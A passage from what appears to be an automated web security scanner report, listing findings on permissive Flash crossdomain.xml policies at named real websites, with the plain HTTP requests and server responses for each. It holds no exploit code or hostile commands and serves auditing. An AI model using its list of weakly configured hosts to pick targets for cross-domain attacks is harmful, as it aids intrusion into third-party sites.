<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />


...[SNIP]...

7.207. http://www.wten.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wten.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wten.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:a0e"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 03:37:02 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 03:37:02 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.208. http://www.wtvm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wtvm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtvm.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS39
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9bf"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 00:56:41 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 00:56:41 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.209. http://www.yourdailyjournal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourdailyjournal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yourdailyjournal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 01 Sep 2010 00:45:29 GMT
ETag: "2cfacd-c3-48f28039e1c40"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.210. http://www.zavers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zavers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zavers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:23 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Tue, 03 May 2011 23:05:38 GMT
ETag: "24c018e-d3-4a2672da59480"
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-doma
...[SNIP]...

7.211. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 00:54:04 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Wed, 04 May 2011 00:59:03 +0000 GMT
Etag: dd40ffddcb43cd2680bde99c7cda50f0
X-Served-By: h02

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

7.212. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:17:58 GMT
Date: Wed, 04 May 2011 01:15:58 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.213. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Tue, 03 May 2011 03:39:37 GMT
Expires: Wed, 04 May 2011 03:39:37 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 76223

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.214. http://mads.cnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mads.cnet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:58 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7038
Keep-Alive: timeout=15, max=768
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

7.215. http://news.cnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.cnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.cnet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:50 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Length: 3257
Keep-Alive: timeout=15, max=970
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.pluggd.com"/>
<allow-access-from domain="*.userplane.com"/>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.motifcdn2.doubleclick.net"/>
<allow-access-from domain="*.juegasgroup.com"/>
...[SNIP]...

7.216. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=111
Expires: Wed, 04 May 2011 01:17:47 GMT
Date: Wed, 04 May 2011 01:15:56 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.217. http://server.iad.liveperson.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:cce"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:14:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

7.218. http://www.abenity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abenity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.abenity.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:33:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 17:02:41 GMT
ETag: "13a9168-ce-4a14879dbae40"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.facebook.com"/>
</cross-domain-p
...[SNIP]...

7.219. http://www.activedayton.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.activedayton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.activedayton.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 115
Content-Type: text/xml
X-N: S
Cache-Control: max-age=86400
Date: Wed, 04 May 2011 00:53:05 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.coxnewsweb.com" />
</cross-domain-policy>

7.220. http://www.aikenstandard.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aikenstandard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aikenstandard.com

Response

HTTP/1.1 200 OK
Content-Length: 1158
Content-Type: text/xml
Content-Location: http://www.aikenstandard.com/crossdomain.xml
Last-Modified: Mon, 28 Mar 2011 20:37:52 GMT
Accept-Ranges: bytes
ETag: "31704e288edcb1:0"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:47:00 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f0f45525d5f4f58455e445a4a423660;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.mediaspanonline.com" />
<allow-access-from domain="mediaspanonline.com" />
<allow-access-from domain="*.mediaspanonline.com" />
<allow-access-from domain="assets.mediaspanonline.com" />
<allow-access-from domain="*.nassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.net" />
<allow-access-from domain="nassauguardian.net" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.cocentral.com" />
<allow-access-from domain="*.mediaspangroup.com" />
<allow-access-from domain="*.mediaspansoftware.com" />
<allow-access-from domain="*.fimc.net" />
<allow-access-from domain="*.firstmediaworks.com" />
<allow-access-from domain="*.firstmediaworks.net" />
